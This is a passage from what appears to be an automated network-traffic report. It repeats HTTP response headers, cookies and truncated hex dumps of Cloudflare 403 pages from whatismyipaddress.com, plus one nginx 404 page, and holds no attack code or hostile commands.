6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:39:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:39:37 GMTSet-Cookie: __cf_bm=dZg45bLLD2l8r0AyDiHaWvLigxUpqs4pfHy9igHniL0-1728999562-1.0.1.1-LVfrx19PQEpVO3A1uisAp544UCxrU2wyDz7nuGEIYh63jslcHdCLA.5uc4TraQROoVk32qfaO1kefZ7d0baYRA; path=/; expires=Tue, 15-Oct-24 14:09:22 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d3037020c3725b5-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:39:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:39:39 GMTSet-Cookie: __cf_bm=1nE0UCey8XtG83SYPAw7TF23SwXgTybrKUmmMiZ8e0M-1728999564-1.0.1.1-PCfYTXH3LEo.nqE7uCIKN0ddrNInlSBEOLfH4V_PnTCsBpjRjkju8LAANPKTpCGETJBBwLlIxldfqmyQiiY9GQ; path=/; expires=Tue, 15-Oct-24 14:09:24 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d303710be1eb3cb-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Tue, 15 Oct 2024 13:39:26 GMTTransfer-Encoding: chunkedConnection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 15 Oct 2024 13:39:29 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:39:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:39:44 GMTSet-Cookie: __cf_bm=o27P_8.1Q7o_KBrL5CpxRxlGZhSGfUovhellNCBPt3U-1728999569-1.0.1.1-Ps86dzFA2ySE4s7AvFNH51Q6UAWlflAmCgdZKT8Numd2dOljmq10iyMEuHTieeL1xcUuUExvZhRLWi35mSbwcg; path=/; expires=Tue, 15-Oct-24 14:09:29 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d30372f3ca1746d-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:39:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:39:48 GMTSet-Cookie: __cf_bm=5yMpV.In6xs.yigWY4VWH1iNK5oS7aiKe6eBOL4Xifk-1728999573-1.0.1.1-JnW_97jN86t2Hc2gjpQD.0gxMboUGc9PRHzEU1IF6NIdDzzqtTmgEwYXj_toZwGIKC1vOLcnLnPgpNmiv5kzRQ; path=/; expires=Tue, 15-Oct-24 14:09:33 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d3037440ce9225d-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:39:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:39:50 GMTSet-Cookie: __cf_bm=qs7qpzbLNrRljCKaFh3TJfJ7sOl4FZgA5t_fqo4mAu4-1728999575-1.0.1.1-3H_7CHI.JeMpVjHLXKVzdWV1BdzwWuf7TMPlfa3ZEl1y_8eVvOtwk8EAFv1X49mkRrzgYTtOsu_tCYuV4MJQ5w; path=/; expires=Tue, 15-Oct-24 14:09:35 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d3037543adfa65f-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:39:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:39:58 GMTSet-Cookie: __cf_bm=dEtUiyT5kOMGsoewrlMsH86fIMeO8ARNOZyXV4KvxLc-1728999583-1.0.1.1-2nrQr8tSbJVapw5qb6k7K8P2GeQ3zP_I4.WtE2QiVZCpLYPYbM1JV_VR7iCk6CIJKZK1SHU9pcyiOMcRKNpVMg; path=/; expires=Tue, 15-Oct-24 14:09:43 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d3037833af1b3cd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 